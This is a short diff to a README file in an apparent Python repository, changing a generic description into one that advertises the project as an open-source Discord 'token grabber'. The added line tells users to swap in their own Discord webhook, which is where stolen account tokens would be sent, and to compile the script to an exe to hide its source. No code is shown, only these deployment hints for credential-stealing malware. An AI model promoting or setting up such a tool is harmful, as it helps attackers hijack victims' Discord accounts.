sourcecodeinit/python-code/README.md

 # python-code
-open source code for different things
+open source token grabber just change discord webhook to your own, change to exe to be non source code